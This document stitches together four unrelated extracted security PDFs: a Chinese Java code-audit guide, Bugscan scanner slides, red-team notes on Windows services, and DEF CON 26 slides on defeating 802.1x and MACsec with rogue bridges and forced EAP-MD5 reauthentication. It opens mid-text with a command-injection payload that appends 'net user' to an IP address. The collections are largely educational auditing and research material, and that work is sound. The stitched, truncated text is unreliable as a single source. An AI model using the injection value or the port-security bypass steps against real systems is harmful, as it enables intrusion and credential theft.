127.0.0.1&&net user 2.1.9 缓冲区溢出 审计方法:主要通过搜索关键词定位,再分析上下文 可搜索以下关键字: strcpy,strcat,scanf,memcpy,memmove,memeccpy Getc(),fgetc(),getchar;read,printf 漏洞示例: 文件\kt\frame\public\tool\socket_repeater\mysocket.h 中第 177 行,这里的的参数 hostname 拷贝到 m_hostname,具体如下图所示: m_hostname 的大小为 MAXNAME : 继续看,可以看到大小为 255 如果传入的长度比 255 要大,就会造成缓冲区溢出。 2.1.10XML 注入 审计方法: XML 解析一般在导入配置、数据传输接口等场景可能会用到,可通过搜索以下关键字定位: DocumentBuilder、XMLStreamReader、SAXBuilder、SAXParser、SAXReader 、XMLReader、 SAXSource 、TransformerFactory 、SAXTransformerFactory 、SchemaFactory 涉及到 XML 文件处理的场景可留意下 XML 解析器是否禁用外部实体,从而判断是否存在 XXE 漏洞示例: 在代码 6 行处、获取 DOM 解析器,解析 XML 文档的输入流,得到一个 Document 如果没有禁用 DTD 则存在 XXE 漏洞,以下代码为 XXE 防御代码 2.1.11 日志记录敏感信息 审计方法: 通过搜索关键词 log.info logger.info 来进行定位 在SFtpOperate.java文件中,代码134行处,直接将用户名密码记录在日志中 2.1.12URL 跳转 审计方法:通过搜索以下关键词定位: sendRedirect、setHeader、forward 需注意有没有配置 url 跳转白名单 漏洞示例: 以下代码中 40 行处只判断 site 只是否为空,没有对 url 进行判断是否为本站 url,导致了 url 跳转漏洞 2.1.13 敏感信息泄露及错误处理 审计方法:查看配置文件是否配置统一错误页面,如果有则不存在此漏洞,如果没有再通过 搜索以下关键词搜索定位, Getmessage、exception 漏洞代码示例: 在以下文件中代码 89 行处打印出程序发生异常时的具体信息 2.1.14 反序列化漏洞 审计方法: Java 程序使用 ObjectInputStream 对象的 readObject 方法将反序列化数据转换为 java 对象。 但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化 产生非预期的对象,在此过程中执行构造的任意代码。 反序列化操作一般在导入模版文件、网络通信、数据传输、日志格式化存储、对象数据落磁 盘或 DB 存储等业务场景,在代码审计时可重点关注一些反序列化操作函数并判断输入是否 可控,如下: ObjectInputStream.readObject ObjectInputStream.readUnshared XMLDecoder.readObject Yaml.load XStream.fromXML ObjectMapper.readValue JSON.parseObject 漏洞示例: 以下代码中,程序读取输入流并将其反序列化为对象。此时可查看项目工程中是否引入可利 用的 commons-collections 3.1、commons-fileupload 1.3.1 等第三方库,即可构造特定反序列 化对象实现任意代码执行。 2.1.15 不安全组件暴露 审计方法: 通过查看配置文件 AndroidManifest.xml,查看<inter-filter>属性有没有配置 false AndriodManifest.xml 文件中,代码 24 行处 activity 组件添加<intent-filter>属性,没有配置 false, 默认组件可被导出 3.1 其他漏洞审计方法 3.1.1CSRF 审计方法:通过查看配置文件有没有配置 csrf 全局过滤器,如果没有则重点看每个操作前有 没有添加 token 的防护机制 在 Smpkpiappealcontroller.java 中 200 处,直接用用 ids 控制删除操作,而没有添加防 csrf 的随机 token 验证检查,存在 csrf 漏洞。 Java/main/com/venustech/tsoc/cupid/smp/kpi/dao/smpkpideclardao.java 517 行,对传 入的 ids 进行删除操作。 3.1.2Struts2 远程代码执行漏洞 审计方法:查看 struts 插件的版本信息是否为漏洞版本 漏洞版本查询网址:https://www.exploit-db.com/ 3.1.3 越权操作 审计方法:重点关注用户操作请求时查看是否有对当前登陆用户权限做校验从而确定是否存 在漏洞,有些厂商会使用一些主流的权限框架,例如 shiro ,spring security 等框架,那么需要 重点关注框架的配置文件以及实现方法 漏洞示例: 在以下文件中采用了 shiro 框架进行权限控制,在代码 58-72 行处为控制访问路径的权限设 置,51-55 行处为对 admin 路径下访问限制,只有 SysyUserFilter 设置了 isAccessAllowed 方法,其他过滤均没有 SysUserFilter 中 isAccessAllowed 具体实现方法如下,90-93 行处没有对是否为当前用户进 行判断,导致了越权 其他过滤文件均只设置了 onAccessDaniad()方法 如果没有使用框架的话,就要注意每个操作是否有权限 代码 7 行处获取 session 里的 username,只判断了 username 是不是为空,如果在截取 数据包的时候将 username 再重新赋一个值就有可能造成越权漏洞。 以这个年度服务费用编制功能为例,测试一下,代码如图所示: 3.1.4 会话超时设置 审计方法: Javaweb 应用会话超时设置一般有俩种方法: 一是在配置文件 web.xml 设置 二是通过 java 代码设置 3.1.5 敏感数据弱加密 审计方法: 敏感数据弱加密主要看数据传输中的加密方法,一般写在工具类 util 中 以下文件中为 base64 编码方法 4.1 工具使用 1. Fortify 1.1 新建扫描 1.1.1 命令行自定义扫描目录: 如果想自定义 Fortify 扫描的目录的话,下面命令比较方便: sourceanalyzer -scan -cp "lib/*.jar" "src/**/*.java" "web/**/*.jsp" -f result.fpr -cp 指定类库的路径,如果没有就不用这个选项 "src/**/*.java" "web/**/*.jsp" 这两个参数指定扫描 src 目录下的所有 java 文件和 web 目录中的所有 jsp 文件 -f 指定扫描结果的输出文件为 result.fpr,扫描完后双击就可以通过 Fortity 查看了。 1.1.2 图形化界面 1.2 查看结果 漏洞列表: 漏洞介绍: Details 漏洞修复建议: Recommendations 漏洞跟踪图: Diagram 2. Sublime Text 2.1 打开项目相应目录: 2.2 全局搜索 Ctrl + Shift + F 全局搜索 上面红框的几个图标可以设置是否大小写敏感,是否搜索整个单词。 3. JD-GUI 没源码时,要分析 jar 包或者 class 文件,就要用到 JD-GUI。 直接拖动某个 jar 或者 class 文件进 jd-gui 就可以打开了,然后搜索关键词审计: 把那些勾都勾上搜索。 4. 文件浏览器 Windows 自带的文件浏览器可以方便地搜索某个文件或者 java,jsp 文件: 实际中,都是 Fortify、Sublime Text 和文件浏览器结合一起用最高效。
pdf
Bugscan 发展历程 01 圈子成员 02 框架改进 03 发展历程 2015.2 正式发布 2011 诞生 历时四年,五次重构 2015.5 圈子发布 2015.8 Bugscan 沙龙 圈子人数增加到5000多人,插件由90个增加到600多 目前可针对20多种系统服务进行识别,弱口令破解; 可识别,扫描80多种主流web程序,网络设备的漏洞。 目前已扫描超过100万的目标,600万余条漏洞记录 圈子成员 圈子(社区) 圈子成员 圈子(社区)核心成员 各种通用型插件,数量最多,质量最高 快速跟踪热点漏洞 发现Xx狗拒绝服务漏洞 各种系统服务,协议漏洞 插件审核,圈子商城 插件审核,插件编写教程 Zero 星光点亮◇天 range Medici.Yan 不流畅 LinE 框架改进-curl的改进 Curl的改进 框架改进-过滤插件 过滤插件的改进 爬虫插件 curl 目标 新目标 过滤型插件 主动插件 curl 目标 过滤型插 件 1.比如检测注入插件中,报错了,过滤型插件就能抓取到 2.比如其他插件在调用curl的时候,过滤型插件发现新的表单 框架改进-日志 日志的改进 服务器与节点通信 爬虫的网址的tree 插件的选派(assign) 插件的验证(audit) 插件调用curl 插件调用debug task的分发 框架插件异常日志 通信 Task分发 选派assign 验证audit Curl的调用 Debug日志 框架改进-日志 日志的改进 服务器与节点通信 爬虫的网址的tree 插件的选派(assign) 插件的验证(audit) 插件调用curl 插件调用debug task的分发 框架插件异常日志 快速定位误报,漏报问题, 定位复杂的综合性bug 发现耗时的插件加以改进。 框架改进-任务分发时的优先级 爬虫插件会推送大量www的task 需要将task普通队列变成优先级队列。 将cms识别。cms类插件,系统插件等重要的插件级别设高。 THANKS FOR YOUR WATCHING
pdf
Windows 安全 - 服务篇(1) 0x00 前言 Windows安全范围真的很大,我也仅仅是在学习路上的行人。边学边记,在自己学习的同时,也希望有 一起的同行者。我计划从Windows服务开始,先学习windows服务的基础机制,然后再学习相关的安全 问题,然后记录这个过程中自己的一些思考,或延申性研究。这个过程中当然大量知识来自于网络公开 文献和《深入理解Windows操作系统7 》上下册。 Windows服务架构简图: 从简图看Windows服务的核心组件并不复杂,用户通常通过SCP类程序,例如:sc.exe等,来控制服务 应用。但是他并不是直接控制的,中间是通过SCM来控制的。 0x02 基础组件 通过上图,我们知道服务的核心组件有3个,分别是:服务应用、服务控制程序(SCP)、服务控制管理 (SCM),我们先学习下这3个核心组件。 1. 服务应用 服务应用很好理解,就是我们开发的可执行程序。和通常的可执行程序不同,服务可执行程序比普通可 执行程序多了接收SCM发送的命令的代码,并返回给SCM,服务当前的状态。通常服务可执行程序没有 用户接口,是终端程序。说到这儿,大家用过CobaltStrike就会发现生成植入体的时候,CS有2种 windows可执行程序,其中就有Service可执行程序,专门用作创建服务时使用。也就是说,你创建服务 时候填入的可执行程序和普通可执行程序是不同的,普通程序没有和SCM通讯的代码,会导致服务启动 失败,但是可以使用cmd.exe /c "xxx.exe"的方式来执行非服务可执行程序,这样在服务启动的时候 cmd.exe由于不能和SCM通信,进程会被终止,但是其子进程xxx.exe不会被终止,依旧执行。这儿需要 注意的是xxx.exe不能是有用户接口的程序,例如:calc.exe这样的程序,需要是终端程序。这是什么原 因呢?这个和session隔离有关,后面说。 服务应用是运行在服务进程当中的,一个服务进程中可以有多个服务应用,因此服务进程分为独占型和 分享型。 Produced by AttackTeamFamily - Author: L.N. - Date: 2022-04-06 No. 1 / 2 - Welcome to www.red-team.cn 2. 服务控制程序(SCP) 服务控制程序,我们用的比较多的是sc.exe和services.msc,他们底层其实调用的都是相同的API。SCP 主要和SCM通信,如果把SCM比作一个服务端,SCP就是它的客户端。scp通过scm间接的去控制服务进 程。SCP其实就是一系列和SCM通信的API,这些API一部分在Advapi32.dll中,例如:CreateService。 Advapi32.dll中只是一小部分API,大部分API还是在Sechost.dll中,Advapi32.dll中很多api都是封装的 Sechost.dll。因此我们想控制Windows服务,除了用services.msc这种交互式方式或者sc.exe这种命令 行的方式以外,还可以直接调用API自己实现相关程序。 SCP用于管理SCM服务的函数有:CreateService、OpenService、StartService、ControlService、 QueryServiceStatus、DeleteService。在使用这些函数管理SCM服务前,需要使用OpenSCManager函 数打开SCM句柄。当然不是谁都能使用OpenSCManager打开SCM句柄的,是需要权限的。看到这儿, 有经验的同学应该遇见过OpenSCManager error 5,这样的错误,特别是在使用类psexec方式进行横向 移动的时候。这个错误的原因就是权限不够,使用OpenSCManager不能打开SCM的服务句柄,也就不 能对服务进行操作。 3. 服务控制管理(SCM) SCM是Windows服务最核心的部分,它直接和服务进程通信,它是服务真正的控制者。下图能够很好的 表示它和服务进程的通信状态: SCM的可执行文件时%SystemRoot%\System32\Services.exe。在系统启动阶段SCM就启动了。SCM启 动的详细流程以及SCM如何控制其他服务启动的方式均在《深入windows操作系统7》下册的446-447页 (ps:目前只有英文版)。 0x03 总结 这个系列文档大多比半笔记的形式编写,因此有点想到哪儿写到哪儿,不会扣每一个细节。Windows服 务的相关利用在红队中非常常见,很多技术都有涉及,时非常有必要深入了解和学习的。 Produced by AttackTeamFamily - Author: L.N. - Date: 2022-04-06 No. 2 / 2 - Welcome to www.red-team.cn
pdf
Owning the LAN in 2018 Defeating MACsec and 802.1x-2010 DEF CON 26 Gabriel “solstice” Ryan Disclaimers & Updates These slides are an early version designed for pre-release prior to DEF CON 26. All content will be updated by the time of the presentation at DEF CON 26 in August. Final versions of all content will be available at: § https://www.digitalsilence.com/blog/ About: Digital Silence Denver-based security consulting firm: § Penetration testers who give a !@#$ § Red teaming § Penetration Testing § Reverse-engineering / advanced appsec / research Twitter (for those of you who are into that sort of thing): @digitalsilence_ About: Gabriel Ryan (a.k.a. solstice) Co-Founder / Senior Security Assessment Manager @ Digital Silence § Former Gotham Digital Silence, former OGSystems § Red teamer / Researcher / New Dad Twitter: @s0lst1c3 LinkedIn: ms08067 Email: gabriel@digitalsilence.com Introduction to 802.1x The 802.1x authentication protocol: § Authentication protocol § Used to protect a local area network (LAN) or wireless local area network (WLAN) with rudimentary authentication What is 802.1x? § Authentication protocol § Used to protect a local area network (LAN) or wireless local area network (WLAN) with rudimentary authentication 802.1.x defines an exchange between three parties: § supplicant – the client device that wishes to connect to the LAN [1][2][9] § authenticator – a network device such as a switch that provides access to the LAN [1][2][9] § authentication server – a host that runs software that implements RADIUS or some other Authorization, Authentication, and Accounting (AAA) protocol [1][2][9] § authenticator can be thought of as a gatekeeper § supplicant connects to a switch port and provides the authenticator with its credentials [1][2][9] § authenticator forwards credentials to the authentication server [1][2][9] § Authentication server validates the credentials, and either allows or denies access the network [1][2][9] 802.1x is (typically) a four step sequence: 1. Initialization 2. Initiation 3. EAP Negotiation 4. Authentication [1][2][9] Ports have two states: § Authorized – traffic is unrestricted § Unauthorized – traffic is restricted to 802.1x [1][2][9] Step 1: Initialization 1. Supplicant connects to switch port, which is disabled 2. Authenticator detects new connection, enables switch port in unauthorized state [1][2][9] Step 2: Initiation 1. (optional) Supplicant sends EAPOL-Start frame [1][2][9] 2. Authenticator responds with EAP-Request-Identity frame [1][2][9] 3. Supplicant sends EAP-Response-Identity frame (contains an identifier such as a username) [1][2][9] 4. Authenticator encapsulates EAP-Response-Identity in a RADIUS Access-Request frame and forwards it to Authentication Server [1][2][9] Step 3: EAP Negotiation Long story short: supplicant and authentication server haggle until they decide on an EAP method that they’re both comfortable with. [1][2][9] Step 4: Authentication § Specific details of how authentication should work are dependent on the EAP method chosen by the authentication server and supplicant [1][2][9] § Always will result in a EAP-Success or EAP-Failure message [1][2][9] § Port is set to authorized state if EAP-Success, otherwise remains unauthorized [1][2][9] What is EAP? Extensible Authentication Protocol (EAP): It’s an authentication framework: § Not really a protocol, only defines message formats § Individual EAP implementations are called ”EAP methods” § Think of it as a black box for performing authentication Notable EAP methods… EAP-MD5 EAP-MD5: Security Issues Entire process occurs over plaintext (bad bad bad bad bad) Brad Antoniewicz and Josh Wright in 2008: [13] § attacker can capture MD5-Challenge-Request and MD5-Challenge- Response by passively sniffing traffic [13] § Dictionary attack can be used to obtain a password using captured data [13] EAP-MD5: Security Issues Fanbao Liu and Tao Xie in 2012: [19] § EAP-MD5 credentials can be recovered even more efficiently using length-recovery attack [19] EAP-PEAP EAP-PEAP: Security Issues Remember – EAP also used for wireless authentication. Brad Antoniewicz and Josh Wright in 2008: [13] § attacker can use a rogue access point attack to force the supplicant to authenticate with a rogue authentication server [13][20] § So long as the supplicant accepts the certificate presented by the attacker’s authentication server, the supplicant will transmit an EAP challenge and response to the attacker [13][21] § can be cracked to obtain a plaintext username and password [13][21] EAP-PEAP: Security Issues MS-CHAPv2 is the strongest Inner Authentication protocol available for use with EAP-PEAP and EAP-TTLS: § vulnerable to a cryptographic weakness discovered by Moxie Marlinspike and David Hulton in 2012 [22] § MS-CHAPv2 challenge and response can be reduced to a single 56- bits of DES encryption [22][23] § The 56-bits can be converted into a password-equivalent NT hash within 24 hours with a 100% success rate using FPGA-based hardware [22][23] EAP-TLS EAP-TLS EAP-TLS was introduced by RFC 5216 in response to weaknesses in EAP methods such as EAP-PEAP and EAP- TTLS: § strength lies in use of mutual certificate-based authentication during the outer authentication process [24] § prevents the kinds of MITM attacks that affect weaker EAP methods [24] § Poor adoption rate [25] Brief History of Wired Port Security Brief History of Wired Port Security 2001 – the 802.1x-2001 standard is created to provided rudimentary authentication for LANs [1] 2004 – the 802.1x-2004 standard is created as an extension of 802.1x-2001 to facilitate the use of 802.1x in WLANs extended 802.1x-2001 for use in WLAN [2] Brief History of Wired Port Security 2005 – Steve Riley demonstrates that 802.1x- 2004 can be bypassed by inserting a hub between supplicant and authenticator [3] § Interaction limited to injecting UDP packets (TCP race condition) [4] Brief History of Wired Port Security 2011 – “Abb” of Gremwell Security creates Marvin: [5] § Bypasses 802.1x by introducing rogue device directly between supplicant and switch [5] § No hub necessary: rogue device configured as a bridge [5] § Full interaction with network using packet injection [5] Brief History of Wired Port Security 2011 – Alva Duckwall’s 802.1x-2004 bypass: [4]: § Transparent bridge used to introduce rogue device between supplicant and switch [4] § No packet injection necessary: network interaction granted by using iptables to source NAT (SNAT) traffic originating from device [4] § More on this attack later... Brief History of Wired Port Security 2017 – Valérian Legrand creates Fenrir: [6]: § Works similarly to Duckwall’s tool, but implements NATing in Python using Scapy (instead of making calls to iptables / arptables / ebtables) [6] § Modular design, support for responder, etc… MAC Filtering and MAC Authentication Bypass (MAB) Fun fact: not all devices support 802.1x…. Not all devices support 802.1x: § Enterprise organizations with 802.1x protected networks need to deploy them anyways § Solution: disable 802.1x on the port used by the device – this is known as a port security exception § 802.1x usually replaced with MAC filtering or some other weak form of access control Port security exceptions: § Historically, very prevalent due to widespread lack of 802.1x support by peripheral devices (printers, IP cameras, etc) § Low hanging fruit for attackers – much easier than trying to actually bypass 802.1x using a bridge or hub Demo: MAB Current State of Wired Port Security Relatively new technology: 802.1x-2010 Uses MACsec to provide: § hop-by-hop Layer 2 encryption [3][4][6][7] § Packet-by-packet integrity check [3][4][6][7] Mitigates bridge-based attacks that affect 802.1x-2004 [7] 802.1x-2010: Vendor Support Largest manufacturers of enterprise networking hardware now support 802.1x-2010 and MACsec: § Limited to high end equipment § Full support for all 802.1x-2010 features varies by make and model 802.1x-2010: Adoption Rates Loaded question, since adoption rates for 802.1x itself remain low. With that said: § MACsec and 802.1x-2010 are just beginning to take off § adoption rate steadily increasing Improvements in Peripheral Device Security Most printer manufacturers offer at least one affordable model that supports 802.1x: § Legacy hardware phased out, replaced with 802.1x capable models § Port security exceptions becoming less prevalent (many sad red teamers) Improvements in Peripheral Device Security Goal of this project: tip the scales back in favor of attackers § explore ways in which 802.1x-2010 and MACsec can be bypassed § Address the reduced prevalence of port security exceptions by identifying alternative methods for attacking peripheral devices Improvements to Bridge-Based Bypass Techniques Classical Bridge-based 802.1x Bypass § Developed by Alva Duckwall in 2014 [4] § Uses transparent bridge to silently introduce rogue device between supplicant and authenticator [4] § Network interaction achieved by using iptables to source NAT (SNAT) traffic originating from device [4] § Hidden SSH service created on rogue device by forwarding traffic to the supplicant’s IP address on a specified port to bridge’s IP address on port 22 [4] Improvement: Leveraging Native EAPOL Forwarding Linux kernel will not forward EAPOL packets over a bridge. Existing tools deal with this problem by either: § patching the Linux kernel § Relying on high level libraries such as Scapy Improvement: Leveraging Native EAPOL Forwarding Problems with both of these approaches: § Relying on Kernel patches can become unwieldy: no publicly available Kernel patches for modern kernel versions § Relying on high level tools such as Scapy can make the bridge slow under heavy loads [17][18] Improvement: Leveraging Native EAPOL Forwarding Fortunately, the situation has dramatically improved since Duckwall’s contribution: § as of 2012, EAPOL bridging can be enabled using the proc file system [11] § that means no more patching :D [11] Improvement: Bypassing Sticky MAC Most modern authenticators use some form of Sticky MAC: § dynamically associates the MAC address of the supplicant to the switch port once the supplicant has successfully authenticated [28][29] § if another MAC address is detected on the switch port, a port security violation occurs and the port is blocked [28][29] Improvement: Bypassing Sticky MAC Our updated implementation: § sets the bridge and PHY interfaces to the MAC address of the authenticator § sets the upstream interface to the MAC address of the supplicant Improvement: Support for Side Channel Interaction In Duckwall’s original bypass, outbound ARP and IP traffic is initially blocked while the transparent bridge is initialized [4]: § Prevents us from using a side channel device, such as an LTE modem Improvement: Bypassing Sticky MAC Our updated implementation: § added a firewall exception that allows outbound traffic from our side channel interface only § allows the user to specify a desired egress destination port Demo: Improvements to Bridge-Based Bypass Techniques Introduction to MACsec and 802.1x-2010 Introduction to 802.1x-2010 and MACsec All traditional 802.1x bypasses (hub, injection, or bridge based) take advantage of the same fundamental security issues that affect 802.1x-2004: [3][4][6][7] § The protocol does not provide encryption § The protocol does not support authentication on a packet- by-packet basis Introduction to 802.1x-2010 and MACsec These security issues are addressed in 802.1x- 2010, which uses MACsec to provide: [7] § Layer 2 encryption performed on a hop-by-hop basis § Packet-by-packet integrity checks Introduction to 802.1x-2010 and MACsec Support for hop-by-hop encryption particularly important: [7] § Protects against bridge-based attacks § Allows network administrators with a means to inspect data in transit Introduction to 802.1x-2010 and MACsec The 802.1x-2010 protocol works in three stages: [7][8][9] 1. Authentication and Master Key Distribution 2. Session Key Agreement 3. Session Secure Things to think about… “IEEE Std 802.11 specifies media-dependent cryptographic methods to protect data transmitted using the 802.11 MAC over wireless networks. Conceptually these cryptographic methods can be considered as playing the same role within systems and interface stacks as a MAC Security Entity.” – IEEE 802.1x-2010 Standard – Section 6.6 [9] Parallels between MACsec and WPA 2003 – WPA1 is released Hop-by-hop Layer 2 Encryption: § access point to station Authentication provided by: § Extensible Authentication Protocol (EAP) § Pre-Shared Key (as a fallback / alternative) Shift of focus due to WPA Injection-based Attacks no longer possible due to Layer 2 encryption Focus shifts to attacking authentication mechanism § Pre-Shared Key (PSK) – WPA Handshake Capture and Dictionary Attack § EAP – Rogue AP attacks against weak EAP methods 2010 – 802.1x-2010 is released Hop-by-hop Layer 2 Encryption using MACsec: § device to switch / switch to switch Authentication provided by: § Extensible Authentication Protocol (EAP) § Pre-Shared Key (as a fallback / alternative) Shift of focus due to MACsec Bridge and injection-based attacks no longer possible due to Layer 2 encryption Focus shifts to attacking authentication mechanism § Pre-Shared Key (PSK) – some kind of dictionary attack??? (still working on that) § EAP – attacks against weak EAP methods (main takeaway of this talk) Defeating MACsec Using Rogue Gateway Attacks Defeating MACsec Using Rogue Gateway Attacks Most important takeaway about 802.1x-2010 (from an attacker’s perspective): [7] § It still uses EAP to authenticate devices to the network § EAP is only as secure as the EAP method used Supported EAP methods: The 802.1x-2010 standard allows any EAP method so long as it: [7] § Supports mutual authentication § Supports derivation of keys that are at least 128 bits in length § Generates an MSK of at least 64 octets Plenty of commonly seen weak EAP methods that meet these requirements (EAP-PEAP, EAP-TTLS, etc). I THINK YOU SEE WHERE THIS IS GOING Our lab environment: Option 1: MITM style bypass Option 2: Direct Access Let’s build a rogue device… Step 1: Device Core Step 2: Mechanically Assisted Bypass FRONT BACK Step 2: Mechanically Assisted Bypass Need a way of manipulating the push switch: § Using relays will lead to impedance issues unless you’re an electrical engineer (which I am certainly not…) § Option B: use solenoids Step 2: Mechanically Assisted Bypass Push Solenoid Pull Solenoid Step 2: Mechanically Assisted Bypass Step 2: Mechanically Assisted Bypass Step 3: Establish a Side Channel Step 4: Plant the Device Step 5: Rogue Gateway Attack Step 6: Bait n Switch Demo: Defeating MACsec Using Rogue Gateway Attacks Dealing With Improvements to Peripheral Device Security Improvements to Peripheral Device Security Improved 802.1x support by peripheral devices: § bypassing port security by looking for policy exceptions has become difficult Improvements to Peripheral Device Security Important caveat: § Improved adoption of 802.1x does not necessarily imply strong port security for peripheral devices § Back to EAP: most EAP methods have major security issues Improvements to Peripheral Device Security Adoption rates for secure EAP methods very poor across all device types: § Secure EAP methods are often challenging to deploy at scale We can expect these adoption rates to be even lower for peripheral devices: § Already painful to configure § Not always centrally manageable through Group Policy (besides, is a domain joined printer really a good idea?) Improvements to Peripheral Device Security What this means: § Peripheral devices are still a viable attack vector for bypassing port security EAP-MD5 Forced Reauthentication Attack EAP-MD5 Forced Reauthentication Attack EAP-MD5 is widely used to protect peripheral devices such as printers: § Easy to setup and configure § Still better than MAC filtering EAP-MD5 Forced Reauthentication Attack Leveraging what we know about how to attack EAP-MD5 and 802.1x-2004: 1. Use bridge-based approach to place rogue device between supplicant and authenticator 2. Wait for the supplicant to authenticate, and sniff the EAP-MD5- Challenge and EAP-MD5-Response when it does [13] 3. Crack credentials, connect to network using Bait n’ Switch EAP-MD5 Forced Reauthentication Attack One major drawback to this approach: § We must wait for the supplicant to reauthenticate with the switch Realistically, this will not happen unless supplicant is unplugged § disabling a virtual network interface is not enough § Using mechanical splitters is an option, but the less overhead the better EAP-MD5 Forced Reauthentication Attack First two steps of the EAP authentication process: [1][2][9] 1. (optional) supplicant sends the authenticator an EAPOL-Start frame 2. The authenticator sends the supplicant an EAP-Request-Identity frame Problem: supplicant has no way of verifying if incoming EAP- Request-Identity frame has been sent in response to an EAPOL-Start. EAP-MD5 Forced Reauthentication Attack What this means: we can force reauthentication by sending an EAPOL-Start frame to the authenticator as if it came from the supplicant (MAC spoofing): § Result: authenticator will send EAP-Request-Identity frame to the actual supplicant, kickstarting the reauthentication process § Both the authenticator and supplicant believe that the other party has initiated the reauthentication attempt Demo: Forced Reauthentication EAP-MD5 Forced Reauthentication Attack EAP-MD5 Forced Reauthentication Attack: 1. Introduce rogue device into the network between authenticator and supplicant 2. Start transparent bridge and passively sniff traffic 3. Force reauthentication by sending spoofed EAPOL-Start frame to the authenticator 4. Captured and crack EAP-MD5-Challenge and EAP-MD5- Response Demo: EAP-MD5 Forced Reauthentication Attack EAP-MD5 Forced Reauthentication Attack Proposed Mitigation – safety-bit in the EAP-Request-Identity frame: § set to 1 when the frame was sent in response to an EAPOL-Start frame § Checked when supplicant receives an EAP-Request-Identity frame § Authentication process aborted if safety bit set to 1 and supplicant did not recently issue EAPOL-Start frame Leveraging Rogue Gateway Attacks Against Peripheral Devices Rogue Gateway Attacks Against Peripheral Devices Other commonly used weak EAP methods used by peripheral devices include EAP-TTLS and EAP-PEAP: [13] § Attacks are considerably more involved compared to EAP-MD5 § Authentication occurs through an encrypted tunnel, so a MITM is necessary to capture the challenge and response [13] Rogue Gateway Attacks Against Peripheral Devices Solution – use Rogue Gateway Attack: § No mechanical splitters needed this time: attack can be implemented in software using transparent bridge Step 1: Plant the Device Step 2: Perform the Attack Closing Thoughts Closing Thoughts Our contributions: § Rogue Gateway and Bait n Switch – Bypass 802.1x-2011 by attacking its authentication mechanism § Updated & improved existing 802.1x-2004 bypass techniques § EAP-MD5 Forced Reauthentication attack – improved attack against EAP-MD5 on wired networks Closing Thoughts Key takeaways (1 of 2): § Port security is still a positive thing (keep using it!) § Port security is not a substitute for a layered approach to network security (i.e. deploying 802.1x does not absolve you from patch management responsibilities) Closing Thoughts Key takeaways (2 of 2): § Benefits provided by 802.1x can be undermined due to continued use of EAP as authentication mechanism § Improved 802.1x support by peripheral device manufacturers largely undermined by lack of support for 802.1x-2010 and low adoptions / support rates for strong EAP methods Blog post & whitepaper: https://www.digitalsilence.com/blog/ Tool: github.com/s0lst1c3/silentbridge References: [1] http://www.ieee802.org/1/pages/802.1x-2001.html [2] http://www.ieee802.org/1/pages/802.1x-2004.html [3] https://blogs.technet.microsoft.com/steriley/2005/08/11/august-article-802-1x-on-wired-networks-considered-harmful/ [4] https://www.defcon.org/images/defcon-19/dc-19-presentations/Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf [5] https://www.gremwell.com/marvin-mitm-tapping-dot1x-links References: [6]https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf [7] https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-networking-services/deploy_guide_c17-663760.html [8] https://1.ieee802.org/security/802-1ae/ [9] https://standards.ieee.org/findstds/standard/802.1X-2010.html [10] http://www.ieee802.org/1/files/public/docs2013/ae-seaman-macsec-hops-0213-v02.pdf References: [11] https://www.gremwell.com/linux_kernel_can_forward_802_1x [12] https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html [13]http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_Wright_Antoniewicz.pdf [14] https://link.springer.com/content/pdf/10.1007%2F978-3-642-30955-7_6.pdf [15] https://support.microsoft.com/en-us/help/922574/the-microsoft-extensible-authentication-protocol-message-digest-5-eap References: [16] https://tools.ietf.org/html/rfc3748 [17] https://code.google.com/archive/p/8021xbridge/source/default/commits [18] https://github.com/mubix/8021xbridge [19] https://hal.inria.fr/hal-01534313/document [20] https://sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1%2F2/ References: [21] https://tools.ietf.org/html/rfc4017 [22] http://web.archive.org/web/20160203043946/https:/www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ [23] https://crack.sh/ [24] https://tools.ietf.org/html/rfc5216 [25] https://4310b1a9-a-93739578-s-sites.googlegroups.com/a/riosec.com/home/articles/Open-Secure-Wireless/Open-Secure- Wireless.pdf?attachauth=ANoY7cqwzbsU93t3gE88UC_qqtG7cVvms7FRutz0KwK1oiBcEJMlQuUmpGSMMD7oZGyGmt4M2HaBhHFb07j8Gvmb_H WIE8rSfLKDvB0AI80u0cYwSNi5ugTP1JtFXsy1yZn8-85icVc32PpzxLJwRinf2UGzNbEdO97Wsc9xcjnc8A8MaFkPbUV5kwsMYHaxMiWwTcE- A8Dp49vv-tmk86pNMaeUeumBw_5vCZ6C3Pvc07hVbyTOsjqo6C6WpfVhd_M0BNW0RQtI&attredirects=0 References: [26] https://txlab.wordpress.com/2012/01/25/call-home-ssh-scripts/ [27] https://txlab.wordpress.com/2012/03/14/improved-call-home-ssh-scripts/ [28] https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3560/software/release/12-2_37_se/command/reference/cr1/cli3.html#wp1948361 [29] https://www.juniper.net/documentation/en_US/junos/topics/concept/port-security-persistent-mac-learning.html [30] https://tools.ietf.org/html/rfc3579 References: [31] https://tools.ietf.org/html/rfc5281
pdf
